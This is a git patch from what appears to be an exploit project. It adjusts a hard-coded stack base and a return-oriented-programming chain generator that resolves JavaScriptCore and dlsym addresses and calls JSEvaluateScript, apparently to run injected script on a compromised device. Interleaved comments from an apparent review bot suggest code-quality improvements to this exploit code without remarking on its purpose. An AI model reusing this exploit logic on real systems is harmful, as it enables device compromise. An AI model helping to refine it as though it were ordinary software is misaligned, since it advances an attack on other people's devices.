From b040db45dfc9ef9a902e48bc2718a94cd099f505 Mon Sep 17 00:00:00 2001
From: spv420
Date: Tue, 31 May 2022 19:51:14 -0400
Subject: I live in a constant state of fear and misery Do you miss me anymore? And I don't even notice When it hurts anymore Anymore Anymore Anymore
---
 src/gen/main.c | 4 ++--
 src/gen/stage2.c | 15 ++++++++++-----
 2 files changed, 12 insertions(+), 7 deletions(-)
(limited to 'src/gen')
diff --git a/src/gen/main.c b/src/gen/main.c
index 30726d5..5ee0286 100644
--- a/src/gen/main.c
+++ b/src/gen/main.c
@@ -206,8 +206,8 @@ int main(int argc,
 fprintf(stderr, "0x%x\n", RTLD_DEFAULT);
- uint32_t stack_base = 0x1c7718; // my shell setup
-// uint32_t stack_base = 0x1c772c; // my shell setup
+// uint32_t stack_base = 0x1c7718; // my shell setup
+ uint32_t stack_base = 0x1c7708; // my shell setup
 // uint32_t stack_base = 0x1c7c88; // my 4s shell setup
 // uint32_t stack_base = 0x1c2e48; // my lldb
 // uint32_t stack_base = 0x1c7d68; // btserver env
diff --git a/src/gen/stage2.c b/src/gen/stage2.c
index 8b98a7e..7e611c8 100644
--- a/src/gen/stage2.c
+++ b/src/gen/stage2.c
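Review bot: The newly active `uint32_t stack_base = 0x1c7708;` line and both commented-out neighbours carry the identical label `// my shell setup`, so the comment no longer tells the reader which environment produces which value, and the commit message does not explain the change either. Put the distinguishing fact in the comment on the new line, e.g. `// my shell setup (state the build/device/session that yields this value)`, and delete the superseded commented-out copies instead of accumulating them, since version control already holds the history. main's body starts and ends outside this hunk.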
@@ -313,12 +313,17 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr_jsc("JSGlobalContextCreateInGroup");
 uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr_jsc("JSContextGetGlobalObject");
 uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr_jsc("JSStringCreateWithUTF8CString");
+ uint32_t JSObjectGetProperty = get_dyld_shc_sym_addr_jsc("JSObjectGetProperty");
 uint32_t JSEvaluateScript = get_dyld_shc_sym_addr_jsc("JSEvaluateScript");
 uint32_t dlsym_ = get_dyld_shc_sym_addr("dlsym");
 MOV_R0(dlsym_);
 STR_R0(base + reserve_addr + 24);
+ fprintf(stderr, "var JSStringCreateWithUTF8CString = 0x%08x;\n"
+ "var JSObjectGetProperty = 0x%08x;\n"
+ "var JSContextGetGlobalObject = 0x%08x;\n", JSStringCreateWithUTF8CString, JSObjectGetProperty, JSContextGetGlobalObject);
+ // uint32_t settimeofday = get_dyld_shc_sym_addr("settimeofday");
 fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, dlsym_);
@@ -356,11 +361,11 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 MOV_R0(0x108000);
 CALL_SLID(JSStringCreateWithUTF8CString);
- STR_R0(base + reserve_addr + 0x48);
+ STR_R0(base + reserve_addr + 0x4a);
 PRINT_STILL_HERE();
- DEREF_IN_R0(base + reserve_addr + 0x48);
+ DEREF_IN_R0(base + reserve_addr + 0x4a);
 MOV_R1_R0();
- CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x48);
+ CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x4a);
 MOV_R1_R0();
 PRINT_STILL_HERE();
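Review bot: The new `JSObjectGetProperty` lookup is echoed by the added `fprintf` without any check on what `get_dyld_shc_sym_addr_jsc` returned; if that helper reports a failed lookup through its return value (its contract is not visible here), the three `var ... = 0x%08x;` lines will print the failure value as if it were a result, so either guard it, e.g. `if (!JSObjectGetProperty) { fprintf(stderr, "lookup failed: JSObjectGetProperty\n"); }` if zero is the helper's failure value, or document on the helper that it cannot fail. The `+ // uint32_t settimeofday = ...` line appears to land as newly added commented-out code; delete it rather than commit it. The added `var` output goes to stderr right next to the existing bare-hex debug line, so a one-line comment saying what consumes these lines (`// debug: symbol addresses in a form the next stage can read`) would help the next reader tell the two outputs apart. gen_rop_chain starts and ends outside this hunk.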
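Review bot: The slot offset `0x4a` replaces `0x48` as a bare literal in three places in this hunk and two more in the hunk at -378, with no comment and no explanation in the commit message; the neighbouring offsets (`24`, `0x44`, `0x48`) are all multiples of four and this one is not, so whether that is intended should be written down where the value is defined. Name the slot once near the top of gen_rop_chain, e.g. `enum { SLOT_SCRIPT = 0x44, SLOT_STRING = 0x4a };` (names constructed) with a comment describing the layout of the reserved area, and write `base + reserve_addr + SLOT_STRING` in the `STR_R0`, `DEREF_IN_R0` and `CALL_SLID_4_PTRARG_L2_0` lines so the next change touches one definition instead of five literals. gen_rop_chain starts and ends outside this hunk.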
@@ -378,13 +383,13 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 MOV_R0(0x10a000);
 CALL_SLID(JSStringCreateWithUTF8CString);
- STR_R0(base + reserve_addr + 0x48);
+ STR_R0(base + reserve_addr + 0x4a);
 PRINT_STILL_HERE();
 /* DEREF_IN_R0(base + reserve_addr + 0x48); MOV_R1_R0(); */
- CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x48);
+ CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x4a);
 MOV_R1_R0();
 PRINT_STILL_HERE();
-- 
cgit v1.2.3
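Review bot: The commented-out block `/* DEREF_IN_R0(base + reserve_addr + 0x48); MOV_R1_R0(); */` still names the old offset while the live `STR_R0` and `CALL_SLID_4_PTRARG_L2_0` lines around it now use `0x4a`, so the dead copy contradicts the code it sits in. Delete the commented-out block rather than keep it (the previous revision is in version control); if it records an alternative the author intends to return to, replace it with a one-line comment that says so, e.g. `// the string slot is not dereferenced here, unlike the block above`. gen_rop_chain starts and ends outside this hunk.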